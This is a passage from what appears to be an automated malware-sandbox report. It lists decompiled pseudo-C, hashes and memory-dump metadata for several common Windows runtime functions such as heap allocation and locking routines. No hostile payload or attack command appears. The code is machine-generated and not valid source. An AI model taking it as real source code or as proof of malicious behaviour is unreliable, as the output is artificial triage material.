                          • Instruction Fuzzy Hash: DE415BB5A00219DFDB19CF58D480BA9BBF1FB49314F1986A9E804EB340D7B8A901CF50
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 048F7016, Relevance: .1, Instructions: 104COMMON
                          Download Yara Rule
                          C-Code - Quality: 76%
                          			E048F7016(short __ecx, intOrPtr __edx, char _a4, char _a8, signed short* _a12, signed short* _a16) {
				signed int _v8;
				char _v588;
				intOrPtr _v592;
				intOrPtr _v596;
				signed short* _v600;
				char _v604;
				short _v606;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed short* _t55;
				void* _t56;
				signed short* _t58;
				signed char* _t61;
				char* _t68;
				void* _t69;
				void* _t71;
				void* _t72;
				signed int _t75;

				_t64 = __edx;
				_t77 = (_t75 & 0xfffffff8) - 0x25c;
				_v8 =  *0x496d360 ^ (_t75 & 0xfffffff8) - 0x0000025c;
				_t55 = _a16;
				_v606 = __ecx;
				_t71 = 0;
				_t58 = _a12;
				_v596 = __edx;
				_v600 = _t58;
				_t68 =  &_v588;
				if(_t58 != 0) {
					_t71 = ( *_t58 & 0x0000ffff) + 2;
					if(_t55 != 0) {
						_t71 = _t71 + ( *_t55 & 0x0000ffff) + 2;
					}
				}
				_t8 = _t71 + 0x2a; // 0x28
				_t33 = _t8;
				_v592 = _t8;
				if(_t71 <= 0x214) {
					L6:
					 *((short*)(_t68 + 6)) = _v606;
					if(_t64 != 0xffffffff) {
						asm("cdq");
						 *((intOrPtr*)(_t68 + 0x20)) = _t64;
						 *((char*)(_t68 + 0x28)) = _a4;
						 *((intOrPtr*)(_t68 + 0x24)) = _t64;
						 *((char*)(_t68 + 0x29)) = _a8;
						if(_t71 != 0) {
							_t22 = _t68 + 0x2a; // 0x2a
							_t64 = _t22;
							E048F6B4C(_t58, _t22, _t71,  &_v604);
							if(_t55 != 0) {
								_t25 = _v604 + 0x2a; // 0x2a
								_t64 = _t25 + _t68;
								E048F6B4C(_t55, _t25 + _t68, _t71 - _v604,  &_v604);
							}
							if(E04897D50() == 0) {
								_t61 = 0x7ffe0384;
							} else {
								_t61 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
							}
							_push(_t68);
							_push(_v592 + 0xffffffe0);
							_push(0x402);
							_push( *_t61 & 0x000000ff);
							E048B9AE0();
						}
					}
					_t35 =  &_v588;
					if( &_v588 != _t68) {
						_t35 = L048977F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t68);
					}
					L16:
					_pop(_t69);
					_pop(_t72);
					_pop(_t56);
					return E048BB640(_t35, _t56, _v8 ^ _t77, _t64, _t69, _t72);
				}
				_t68 = L04894620(_t58,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t33);
				if(_t68 == 0) {
					goto L16;
				} else {
					_t58 = _v600;
					_t64 = _v596;
					goto L6;
				}
			}






















                          0x048f7016
                          0x048f701e
                          0x048f702b
                          0x048f7033
                          0x048f7037
                          0x048f703c
                          0x048f703e
                          0x048f7041
                          0x048f7045
                          0x048f704a
                          0x048f7050
                          0x048f7055
                          0x048f705a
                          0x048f7062
                          0x048f7062
                          0x048f705a
                          0x048f7064
                          0x048f7064
                          0x048f7067
                          0x048f7071
                          0x048f7096
                          0x048f709b
                          0x048f70a2
                          0x048f70a6
                          0x048f70a7
                          0x048f70ad
                          0x048f70b3
                          0x048f70b6
                          0x048f70bb
                          0x048f70c3
                          0x048f70c3
                          0x048f70c6
                          0x048f70cd
                          0x048f70dd
                          0x048f70e0
                          0x048f70e2
                          0x048f70e2
                          0x048f70ee
                          0x048f7101
                          0x048f70f0
                          0x048f70f9
                          0x048f70f9
                          0x048f710a
                          0x048f710e
                          0x048f7112
                          0x048f7117
                          0x048f7118
                          0x048f7118
                          0x048f70bb
                          0x048f711d
                          0x048f7123
                          0x048f7131
                          0x048f7131
                          0x048f7136
                          0x048f713d
                          0x048f713e
                          0x048f713f
                          0x048f714a
                          0x048f714a
                          0x048f7084
                          0x048f7088
                          0x00000000
                          0x048f708e
                          0x048f708e
                          0x048f7092
                          0x00000000
                          0x048f7092

                          Memory Dump Source
                          • Source File: 00000008.00000002.937373897.0000000004850000.00000040.00000001.sdmp, Offset: 04850000, based on PE: true
                          • Associated: 00000008.00000002.937561044.000000000496B000.00000040.00000001.sdmp Download File
                          • Associated: 00000008.00000002.937575334.000000000496F000.00000040.00000001.sdmp Download File
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 89590c3323a7547d7b9810bf60ae8af36a620d98dc22cf95791686b4541ce35d
                          • Instruction ID: 132c48188d2bd82b6127fe493bbe806ef3efcad71d55cf7c6f811060bd078e2e
                          • Opcode Fuzzy Hash: 89590c3323a7547d7b9810bf60ae8af36a620d98dc22cf95791686b4541ce35d
                          • Instruction Fuzzy Hash: AC318F726047919BD321DF68CD40A6AB7E9BFC8700F044B29F995D7690E770F904CBA6
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 0489C182, Relevance: .1, Instructions: 104COMMON
                          Download Yara Rule
                          C-Code - Quality: 68%
                          			E0489C182(void* __ecx, unsigned int* __edx, intOrPtr _a4) {
				signed int* _v8;
				char _v16;
				void* __ebx;
				void* __edi;
				signed char _t33;
				signed char _t43;
				signed char _t48;
				signed char _t62;
				void* _t63;
				intOrPtr _t69;
				intOrPtr _t71;
				unsigned int* _t82;
				void* _t83;

				_t80 = __ecx;
				_t82 = __edx;
				_t33 =  *((intOrPtr*)(__ecx + 0xde));
				_t62 = _t33 >> 0x00000001 & 0x00000001;
				if((_t33 & 0x00000001) != 0) {
					_v8 = ((0 | _t62 != 0x00000000) - 0x00000001 & 0x00000048) + 8 + __edx;
					if(E04897D50() != 0) {
						_t43 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
					} else {
						_t43 = 0x7ffe0386;
					}
					if( *_t43 != 0) {
						_t43 = E04948D34(_v8, _t80);
					}
					E04892280(_t43, _t82);
					if( *((char*)(_t80 + 0xdc)) == 0) {
						E0488FFB0(_t62, _t80, _t82);
						 *(_t80 + 0xde) =  *(_t80 + 0xde) | 0x00000004;
						_t30 = _t80 + 0xd0; // 0xd0
						_t83 = _t30;
						E04948833(_t83,  &_v16);
						_t81 = _t80 + 0x90;
						E0488FFB0(_t62, _t80 + 0x90, _t80 + 0x90);
						_t63 = 0;
						_push(0);
						_push(_t83);
						_t48 = E048BB180();
						if(_a4 != 0) {
							E04892280(_t48, _t81);
						}
					} else {
						_t69 = _v8;
						_t12 = _t80 + 0x98; // 0x98
						_t13 = _t69 + 0xc; // 0x575651ff
						E0489BB2D(_t13, _t12);
						_t71 = _v8;
						_t15 = _t80 + 0xb0; // 0xb0
						_t16 = _t71 + 8; // 0x8b000cc2
						E0489BB2D(_t16, _t15);
						E0489B944(_v8, _t62);
						 *((char*)(_t80 + 0xdc)) = 0;
						E0488FFB0(0, _t80, _t82);
						 *((intOrPtr*)(_t80 + 0xd8)) = 0;
						 *((intOrPtr*)(_t80 + 0xc8)) = 0;
						 *((intOrPtr*)(_t80 + 0xcc)) = 0;
						 *(_t80 + 0xde) = 0;
						if(_a4 == 0) {
							_t25 = _t80 + 0x90; // 0x90
							E0488FFB0(0, _t80, _t25);
						}
						_t63 = 1;
					}
					return _t63;
				}
				 *((intOrPtr*)(__ecx + 0xc8)) = 0;
				 *((intOrPtr*)(__ecx + 0xcc)) = 0;
				if(_a4 == 0) {
					_t24 = _t80 + 0x90; // 0x90
					E0488FFB0(0, __ecx, _t24);
				}
				return 0;
			}
















                          0x0489c18d
                          0x0489c18f
                          0x0489c191
                          0x0489c19b
                          0x0489c1a0
                          0x0489c1d4
                          0x0489c1de
                          0x048e2d6e
                          0x0489c1e4
                          0x0489c1e4
                          0x0489c1e4
                          0x0489c1ec
                          0x048e2d7d
                          0x048e2d7d
                          0x0489c1f3
                          0x0489c1ff
                          0x048e2d88
                          0x048e2d8d
                          0x048e2d94
                          0x048e2d94
                          0x048e2d9f
                          0x048e2da4
                          0x048e2dab
                          0x048e2db0
                          0x048e2db2
                          0x048e2db3
                          0x048e2db4
                          0x048e2dbc
                          0x048e2dc3
                          0x048e2dc3
                          0x0489c205
                          0x0489c205
                          0x0489c208
                          0x0489c20e
                          0x0489c211
                          0x0489c216
                          0x0489c219
                          0x0489c21f
                          0x0489c222
                          0x0489c22c
                          0x0489c234
                          0x0489c23a
                          0x0489c23f
                          0x0489c245
                          0x0489c24b
                          0x0489c251
                          0x0489c25a
                          0x0489c276
                          0x0489c27d
                          0x0489c27d
                          0x0489c25c
                          0x0489c25c
                          0x00000000
                          0x0489c25e
                          0x0489c1a4
                          0x0489c1aa
                          0x0489c1b3
                          0x0489c265
                          0x0489c26c
                          0x0489c26c
                          0x00000000

                          Memory Dump Source
                          • Source File: 00000008.00000002.937373897.0000000004850000.00000040.00000001.sdmp, Offset: 04850000, based on PE: true
                          • Associated: 00000008.00000002.937561044.000000000496B000.00000040.00000001.sdmp Download File
                          • Associated: 00000008.00000002.937575334.000000000496F000.00000040.00000001.sdmp Download File
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: b4a3881b78bd852e90f123f8f308f7d6cb7f2242736900428c2759f2d7e2a9ea
                          • Instruction ID: 7654423dd50e3bc438ea9a95d52faafaa61691dc62c1b29be710b6c931bf251d
                          • Opcode Fuzzy Hash: b4a3881b78bd852e90f123f8f308f7d6cb7f2242736900428c2759f2d7e2a9ea
                          • Instruction Fuzzy Hash: D9312A7170198ABEEB08EBF8C480BE9F794BF42208F084B5AD518D7241DB757E45D791
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 048AA70E, Relevance: .1, Instructions: 96COMMON
                          Download Yara Rule
                          C-Code - Quality: 92%
                          			E048AA70E(intOrPtr* __ecx, char* __edx) {
				unsigned int _v8;
				intOrPtr* _v12;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* _t16;
				intOrPtr _t17;
				intOrPtr _t28;
				char* _t33;
				intOrPtr _t37;
				intOrPtr _t38;
				void* _t50;
				intOrPtr _t52;

				_push(__ecx);
				_push(__ecx);
				_t52 =  *0x4967b10; // 0x8
				_t33 = __edx;
				_t48 = __ecx;
				_v12 = __ecx;
				if(_t52 == 0) {
					 *0x4967b10 = 8;
					 *0x4967b14 = 0x4967b0c;
					 *0x4967b18 = 1;
					L6:
					_t2 = _t52 + 1; // 0x9
					E048AA990(0x4967b10, _t2, 7);
					asm("bts ecx, eax");
					 *_t48 = _t52;
					 *_t33 = 1;
					L3:
					_t16 = 0;
					L4:
					return _t16;
				}
				_t17 = L048AA840(__edx, __ecx, __ecx, _t52, 0x4967b10, 1, 0);
				if(_t17 == 0xffffffff) {
					_t37 =  *0x4967b10; // 0x8
					_t3 = _t37 + 0x27; // 0x2f
					__eflags = _t3 >> 5 -  *0x4967b18; // 0x1
					if(__eflags > 0) {
						_t38 =  *0x4967b9c; // 0x0
						_t4 = _t52 + 0x27; // 0x2f
						_v8 = _t4 >> 5;
						_t50 = L04894620(_t38 + 0xc0000,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t38 + 0xc0000, _t4 >> 5 << 2);
						__eflags = _t50;
						if(_t50 == 0) {
							_t16 = 0xc0000017;
							goto L4;
						}
						 *0x4967b18 = _v8;
						_t8 = _t52 + 7; // 0xf
						E048BF3E0(_t50,  *0x4967b14, _t8 >> 3);
						_t28 =  *0x4967b14; // 0x771c7b0c
						__eflags = _t28 - 0x4967b0c;
						if(_t28 != 0x4967b0c) {
							L048977F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t28);
						}
						_t9 = _t52 + 8; // 0x10
						 *0x4967b14 = _t50;
						_t48 = _v12;
						 *0x4967b10 = _t9;
						goto L6;
					}
					 *0x4967b10 = _t37 + 8;
					goto L6;
				}
				 *__ecx = _t17;
				 *_t33 = 0;
				goto L3;
			}
















                          0x048aa713
                          0x048aa714
                          0x048aa717
                          0x048aa71d
                          0x048aa720
                          0x048aa722
                          0x048aa727
                          0x048aa74a
                          0x048aa754
                          0x048aa75e
                          0x048aa768
                          0x048aa76a
                          0x048aa773
                          0x048aa78b
                          0x048aa790
                          0x048aa792
                          0x048aa741
                          0x048aa741
                          0x048aa743
                          0x048aa749
                          0x048aa749
                          0x048aa732
                          0x048aa73a
                          0x048aa797
                          0x048aa79d
                          0x048aa7a3
                          0x048aa7a9
                          0x048aa7b6
                          0x048aa7bc
                          0x048aa7ca
                          0x048aa7e0
                          0x048aa7e2
                          0x048aa7e4
                          0x048e9bf2
                          0x00000000
                          0x048e9bf2
                          0x048aa7ed
                          0x048aa7f2
                          0x048aa800
                          0x048aa805
                          0x048aa80d
                          0x048aa812
                          0x048e9c08
                          0x048e9c08
                          0x048aa818
                          0x048aa81b
                          0x048aa821
                          0x048aa824
                          0x00000000
                          0x048aa824
                          0x048aa7ae
                          0x00000000
                          0x048aa7ae
                          0x048aa73c
                          0x048aa73e
                          0x00000000

                          Memory Dump Source
                          • Source File: 00000008.00000002.937373897.0000000004850000.00000040.00000001.sdmp, Offset: 04850000, based on PE: true
                          • Associated: 00000008.00000002.937561044.000000000496B000.00000040.00000001.sdmp Download File
                          • Associated: 00000008.00000002.937575334.000000000496F000.00000040.00000001.sdmp Download File
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: b2695921b347312546b331419ef321a2feae1dc38a50a7872c388be57fdd8edc
                          • Instruction ID: e716c6ce1ee233572962e3f6c4c76f7940ed4b34f2057962d10b37123a972507
                          • Opcode Fuzzy Hash: b2695921b347312546b331419ef321a2feae1dc38a50a7872c388be57fdd8edc
                          • Instruction Fuzzy Hash: 6B31C0B1618204DFE715CBA8D880F267BFDEB85718F140EA9E055D7640D7B4AD11CB92
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 048A61A0, Relevance: .1, Instructions: 93COMMON
                          Download Yara Rule
                          C-Code - Quality: 97%
                          			E048A61A0(signed int* __ecx) {
				intOrPtr _v8;
				char _v12;
				intOrPtr* _v16;
				intOrPtr _v20;
				intOrPtr _t30;
				intOrPtr _t31;
				void* _t32;
				intOrPtr _t33;
				intOrPtr _t37;
				intOrPtr _t49;
				signed int _t51;
				intOrPtr _t52;
				signed int _t54;
				void* _t59;
				signed int* _t61;
				intOrPtr* _t64;

				_t61 = __ecx;
				_v12 = 0;
				_t30 =  *((intOrPtr*)( *[fs:0x30] + 0x1e8));
				_v16 = __ecx;
				_v8 = 0;
				if(_t30 == 0) {
					L6:
					_t31 = 0;
					L7:
					return _t31;
				}
				_t32 = _t30 + 0x5d8;
				if(_t32 == 0) {
					goto L6;
				}
				_t59 = _t32 + 0x30;
				if( *((intOrPtr*)(_t32 + 0x30)) == 0) {
					goto L6;
				}
				if(__ecx != 0) {
					 *((intOrPtr*)(__ecx)) = 0;
					 *((intOrPtr*)(__ecx + 4)) = 0;
				}
				if( *((intOrPtr*)(_t32 + 0xc)) != 0) {
					_t51 =  *(_t32 + 0x10);
					_t33 = _t32 + 0x10;
					_v20 = _t33;
					_t54 =  *(_t33 + 4);
					if((_t51 | _t54) == 0) {
						_t37 = E048A5E50(0x48567cc, 0, 0,  &_v12);
						if(_t37 != 0) {
							goto L6;
						}
						_t52 = _v8;
						asm("lock cmpxchg8b [esi]");
						_t64 = _v16;
						_t49 = _t37;
						_v20 = 0;
						if(_t37 == 0) {
							if(_t64 != 0) {
								 *_t64 = _v12;
								 *((intOrPtr*)(_t64 + 4)) = _t52;
							}
							E04949D2E(_t59, 0, _v12, _v8,  *( *((intOrPtr*)( *[fs:0x30] + 0x10)) + 0x38) & 0x0000ffff,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0x10)) + 0x3c)));
							_t31 = 1;
							goto L7;
						}
						E0487F7C0(_t52, _v12, _t52, 0);
						if(_t64 != 0) {
							 *_t64 = _t49;
							 *((intOrPtr*)(_t64 + 4)) = _v20;
						}
						L12:
						_t31 = 1;
						goto L7;
					}
					if(_t61 != 0) {
						 *_t61 = _t51;
						_t61[1] = _t54;
					}
					goto L12;
				} else {
					goto L6;
				}
			}



















                          0x048a61b3
                          0x048a61b5
                          0x048a61bd
                          0x048a61c3
                          0x048a61c7
                          0x048a61d2
                          0x048a61ff
                          0x048a61ff
                          0x048a6201
                          0x048a6207
                          0x048a6207
                          0x048a61d4
                          0x048a61d9
                          0x00000000
                          0x00000000
                          0x048a61df
                          0x048a61e2
                          0x00000000
                          0x00000000
                          0x048a61e6
                          0x048a61e8
                          0x048a61ee
                          0x048a61ee
                          0x048a61f9
                          0x048e762f
                          0x048e7632
                          0x048e7635
                          0x048e7639
                          0x048e7640
                          0x048e766e
                          0x048e7675
                          0x00000000
                          0x00000000
                          0x048e7681
                          0x048e7689
                          0x048e768d
                          0x048e7691
                          0x048e7695
                          0x048e7699
                          0x048e76af
                          0x048e76b5
                          0x048e76b7
                          0x048e76b7
                          0x048e76d7
                          0x048e76dc
                          0x00000000
                          0x048e76dc
                          0x048e76a2
                          0x048e76a9
                          0x048e7651
                          0x048e7653
                          0x048e7653
                          0x048e7656
                          0x048e7656
                          0x00000000
                          0x048e7656
                          0x048e7644
                          0x048e7646
                          0x048e7648
                          0x048e7648
                          0x00000000
                          0x00000000
                          0x00000000
                          0x00000000

                          Memory Dump Source
                          • Source File: 00000008.00000002.937373897.0000000004850000.00000040.00000001.sdmp, Offset: 04850000, based on PE: true
                          • Associated: 00000008.00000002.937561044.000000000496B000.00000040.00000001.sdmp Download File
                          • Associated: 00000008.00000002.937575334.000000000496F000.00000040.00000001.sdmp Download File
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 103cc8f84b4b065eeeb180f17c30216bb6c79cb0187f65033de24e87b6f79530
                          • Instruction ID: a237afb976d2a99595bb5c0430d569b4a83714f921d45ca3df209fe62f4a1d16
                          • Opcode Fuzzy Hash: 103cc8f84b4b065eeeb180f17c30216bb6c79cb0187f65033de24e87b6f79530
                          • Instruction Fuzzy Hash: 8D315C71605301CFE320DF19C904B26B7E4FB88B08F094E6EE994D7265E7B0E804CB91
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 048B8EC7, Relevance: .1, Instructions: 92COMMON
                          Download Yara Rule
                          C-Code - Quality: 93%
                          			E048B8EC7(void* __ecx, void* __edx) {
				signed int _v8;
				intOrPtr _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				char* _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				intOrPtr _v40;
				signed int* _v44;
				intOrPtr _v48;
				intOrPtr _v52;
				intOrPtr _v56;
				signed int* _v60;
				intOrPtr _v64;
				intOrPtr _v68;
				intOrPtr _v72;
				char* _v76;
				intOrPtr _v80;
				signed int _v84;
				intOrPtr _v88;
				intOrPtr _v92;
				intOrPtr _v96;
				intOrPtr _v100;
				intOrPtr _v104;
				signed int* _v108;
				char _v140;
				signed int _v144;
				signed int _v148;
				intOrPtr _v152;
				char _v156;
				intOrPtr _v160;
				char _v164;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* _t67;
				intOrPtr _t70;
				void* _t71;
				void* _t72;
				signed int _t73;

				_t69 = __edx;
				_v8 =  *0x496d360 ^ _t73;
				_t48 =  *[fs:0x30];
				_t72 = __edx;
				_t71 = __ecx;
				if( *((intOrPtr*)( *[fs:0x30] + 0x18)) != 0) {
					_t48 = E048A4E70(0x49686e4, 0x48b9490, 0, 0);
					if( *0x49653e8 > 5 && E048B8F33(0x49653e8, 0, 0x2000) != 0) {
						_v156 =  *((intOrPtr*)(_t71 + 0x44));
						_v144 =  *(_t72 + 0x44) & 0x0000ffff;
						_v148 =  *(_t72 + 0x46) & 0x0000ffff;
						_v164 =  *((intOrPtr*)(_t72 + 0x58));
						_v108 =  &_v84;
						_v92 =  *((intOrPtr*)(_t71 + 0x28));
						_v84 =  *(_t71 + 0x24) & 0x0000ffff;
						_v76 =  &_v156;
						_t70 = 8;
						_v60 =  &_v144;
						_t67 = 4;
						_v44 =  &_v148;
						_v152 = 0;
						_v160 = 0;
						_v104 = 0;
						_v100 = 2;
						_v96 = 0;
						_v88 = 0;
						_v80 = 0;
						_v72 = 0;
						_v68 = _t70;
						_v64 = 0;
						_v56 = 0;
						_v52 = 0x49653e8;
						_v48 = 0;
						_v40 = 0;
						_v36 = 0x49653e8;
						_v32 = 0;
						_v28 =  &_v164;
						_v24 = 0;
						_v20 = _t70;
						_v16 = 0;
						_t69 = 0x485bc46;
						_t48 = E048F7B9C(0x49653e8, 0x485bc46, _t67, 0x49653e8, _t70,  &_v140);
					}
				}
				return E048BB640(_t48, 0, _v8 ^ _t73, _t69, _t71, _t72);
			}











































                          0x048b8ec7
                          0x048b8ed9
                          0x048b8edc
                          0x048b8ee6
                          0x048b8ee9
                          0x048b8eee
                          0x048b8efc
                          0x048b8f08
                          0x048f1349
                          0x048f1353
                          0x048f135d
                          0x048f1366
                          0x048f136f
                          0x048f1375
                          0x048f137c
                          0x048f1385
                          0x048f1390
                          0x048f1391
                          0x048f139c
                          0x048f139d
                          0x048f13a6
                          0x048f13ac
                          0x048f13b2
                          0x048f13b5
                          0x048f13bc
                          0x048f13bf
                          0x048f13c2
                          0x048f13c5
                          0x048f13c8
                          0x048f13cb
                          0x048f13ce
                          0x048f13d1
                          0x048f13d4
                          0x048f13d7
                          0x048f13da
                          0x048f13dd
                          0x048f13e0
                          0x048f13e3
                          0x048f13e6
                          0x048f13e9
                          0x048f13f6
                          0x048f1400
                          0x048f1400
                          0x048b8f08
                          0x048b8f32

                          Memory Dump Source
                          • Source File: 00000008.00000002.937373897.0000000004850000.00000040.00000001.sdmp, Offset: 04850000, based on PE: true
                          • Associated: 00000008.00000002.937561044.000000000496B000.00000040.00000001.sdmp Download File
                          • Associated: 00000008.00000002.937575334.000000000496F000.00000040.00000001.sdmp Download File
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 4733c949095a9bc0df1bf7870af7ed126e614cb6eff745d7256e06f441449750
                          • Instruction ID: 67d1f8b904701f9b710d858ac963c313f5746626c16af82e4d722be4ca287e5a
                          • Opcode Fuzzy Hash: 4733c949095a9bc0df1bf7870af7ed126e614cb6eff745d7256e06f441449750
                          • Instruction Fuzzy Hash: 64418FB1D002189EDB20DFAAD980AADFBF8BB48714F5046AEE549E7600D7746A448F51
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 048AE730, Relevance: .1, Instructions: 89COMMON
                          Download Yara Rule
                          C-Code - Quality: 74%
                          			E048AE730(void* __edx, signed int _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28, intOrPtr _a32, intOrPtr _a36, intOrPtr* _a40) {
				intOrPtr* _v0;
				signed char _v4;
				signed int _v8;
				void* __ecx;
				void* __ebp;
				void* _t37;
				intOrPtr _t38;
				signed int _t44;
				signed char _t52;
				void* _t54;
				intOrPtr* _t56;
				void* _t58;
				char* _t59;
				signed int _t62;

				_t58 = __edx;
				_push(0);
				_push(4);
				_push( &_v8);
				_push(0x24);
				_push(0xffffffff);
				if(E048B9670() < 0) {
					L048CDF30(_t54, _t58, _t35);
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					_push(_t54);
					_t52 = _v4;
					if(_t52 > 8) {
						_t37 = 0xc0000078;
					} else {
						_t38 =  *0x4967b9c; // 0x0
						_t62 = _t52 & 0x000000ff;
						_t59 = L04894620(8 + _t62 * 4,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t38 + 0x140000, 8 + _t62 * 4);
						if(_t59 == 0) {
							_t37 = 0xc0000017;
						} else {
							_t56 = _v0;
							 *(_t59 + 1) = _t52;
							 *_t59 = 1;
							 *((intOrPtr*)(_t59 + 2)) =  *_t56;
							 *((short*)(_t59 + 6)) =  *((intOrPtr*)(_t56 + 4));
							_t44 = _t62 - 1;
							if(_t44 <= 7) {
								switch( *((intOrPtr*)(_t44 * 4 +  &M048AE810))) {
									case 0:
										L6:
										 *((intOrPtr*)(_t59 + 8)) = _a8;
										goto L7;
									case 1:
										L13:
										 *((intOrPtr*)(__edx + 0xc)) = _a12;
										goto L6;
									case 2:
										L12:
										 *((intOrPtr*)(__edx + 0x10)) = _a16;
										goto L13;
									case 3:
										L11:
										 *((intOrPtr*)(__edx + 0x14)) = _a20;
										goto L12;
									case 4:
										L10:
										 *((intOrPtr*)(__edx + 0x18)) = _a24;
										goto L11;
									case 5:
										L9:
										 *((intOrPtr*)(__edx + 0x1c)) = _a28;
										goto L10;
									case 6:
										L17:
										 *((intOrPtr*)(__edx + 0x20)) = _a32;
										goto L9;
									case 7:
										 *((intOrPtr*)(__edx + 0x24)) = _a36;
										goto L17;
								}
							}
							L7:
							 *_a40 = _t59;
							_t37 = 0;
						}
					}
					return _t37;
				} else {
					_push(0x20);
					asm("ror eax, cl");
					return _a4 ^ _v8;
				}
			}

















                          0x048ae730
                          0x048ae736
                          0x048ae738
                          0x048ae73d
                          0x048ae73e
                          0x048ae740
                          0x048ae749
                          0x048ae765
                          0x048ae76a
                          0x048ae76b
                          0x048ae76c
                          0x048ae76d
                          0x048ae76e
                          0x048ae76f
                          0x048ae775
                          0x048ae777
                          0x048ae77e
                          0x048eb675
                          0x048ae784
                          0x048ae784
                          0x048ae789
                          0x048ae7a8
                          0x048ae7ac
                          0x048ae807
                          0x048ae7ae
                          0x048ae7ae
                          0x048ae7b1
                          0x048ae7b4
                          0x048ae7b9
                          0x048ae7c0
                          0x048ae7c4
                          0x048ae7ca
                          0x048ae7cc
                          0x00000000
                          0x048ae7d3
                          0x048ae7d6
                          0x00000000
                          0x00000000
                          0x048ae7ff
                          0x048ae802
                          0x00000000
                          0x00000000
                          0x048ae7f9
                          0x048ae7fc
                          0x00000000
                          0x00000000
                          0x048ae7f3
                          0x048ae7f6
                          0x00000000
                          0x00000000
                          0x048ae7ed
                          0x048ae7f0
                          0x00000000
                          0x00000000
                          0x048ae7e7
                          0x048ae7ea
                          0x00000000
                          0x00000000
                          0x048eb685
                          0x048eb688
                          0x00000000
                          0x00000000
                          0x048eb682
                          0x00000000
                          0x00000000
                          0x048ae7cc
                          0x048ae7d9
                          0x048ae7dc
                          0x048ae7de
                          0x048ae7de
                          0x048ae7ac
                          0x048ae7e4
                          0x048ae74b
                          0x048ae751
                          0x048ae759
                          0x048ae761
                          0x048ae761

                          Memory Dump Source
                          • Source File: 00000008.00000002.937373897.0000000004850000.00000040.00000001.sdmp, Offset: 04850000, based on PE: true
                          • Associated: 00000008.00000002.937561044.000000000496B000.00000040.00000001.sdmp Download File
                          • Associated: 00000008.00000002.937575334.000000000496F000.00000040.00000001.sdmp Download File
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 99e41733484f27d27c0c04f5b9bf0be311b7185af68145c7df19fc59a8332cc5
                          • Instruction ID: 6a39640488b82ccc35d7cf0afb1a2cc4a6a92161fcf55580b23f92fb1ece5bdf
                          • Opcode Fuzzy Hash: 99e41733484f27d27c0c04f5b9bf0be311b7185af68145c7df19fc59a8332cc5
                          • Instruction Fuzzy Hash: 53318FB5A54249EFE704CF58C840BA6BBE4FB09314F148A6AF904CB341E775EC90CBA1
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 048ABC2C, Relevance: .1, Instructions: 88COMMON
                          Download Yara Rule
                          C-Code - Quality: 67%
                          			E048ABC2C(intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4, signed int _a8) {
				intOrPtr _v8;
				intOrPtr _v12;
				void* __ebx;
				void* __edi;
				intOrPtr _t22;
				intOrPtr* _t41;
				intOrPtr _t51;

				_t51 =  *0x4966100; // 0x37
				_v12 = __edx;
				_v8 = __ecx;
				if(_t51 >= 0x800) {
					L12:
					return 0;
				} else {
					goto L1;
				}
				while(1) {
					L1:
					_t22 = _t51;
					asm("lock cmpxchg [ecx], edx");
					if(_t51 == _t22) {
						break;
					}
					_t51 = _t22;
					if(_t22 < 0x800) {
						continue;
					}
					goto L12;
				}
				E04892280(0xd, 0x16eff1a0);
				_t41 =  *0x49660f8; // 0x0
				if(_t41 != 0) {
					 *0x49660f8 =  *_t41;
					 *0x49660fc =  *0x49660fc + 0xffff;
				}
				E0488FFB0(_t41, 0x800, 0x16eff1a0);
				if(_t41 != 0) {
					L6:
					asm("movsd");
					asm("movsd");
					asm("movsd");
					asm("movsd");
					 *((intOrPtr*)(_t41 + 0x1c)) = _v12;
					 *((intOrPtr*)(_t41 + 0x20)) = _a4;
					 *(_t41 + 0x36) =  *(_t41 + 0x36) & 0x00008000 | _a8 & 0x00003fff;
					do {
						asm("lock xadd [0x49660f0], ax");
						 *((short*)(_t41 + 0x34)) = 1;
					} while (1 == 0);
					goto L8;
				} else {
					_t41 = L04894620(0x4966100,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, 0xd0);
					if(_t41 == 0) {
						L11:
						asm("lock dec dword [0x4966100]");
						L8:
						return _t41;
					}
					 *(_t41 + 0x24) =  *(_t41 + 0x24) & 0x00000000;
					 *(_t41 + 0x28) =  *(_t41 + 0x28) & 0x00000000;
					if(_t41 == 0) {
						goto L11;
					}
					goto L6;
				}
			}










                          0x048abc36
                          0x048abc42
                          0x048abc45
                          0x048abc4a
                          0x048abd35
                          0x00000000
                          0x00000000
                          0x00000000
                          0x00000000
                          0x048abc50
                          0x048abc50
                          0x048abc58
                          0x048abc5a
                          0x048abc60
                          0x00000000
                          0x00000000
                          0x048ea4f2
                          0x048ea4f6
                          0x00000000
                          0x00000000
                          0x00000000
                          0x048ea4fc
                          0x048abc79
                          0x048abc7e
                          0x048abc86
                          0x048abd16
                          0x048abd20
                          0x048abd20
                          0x048abc8d
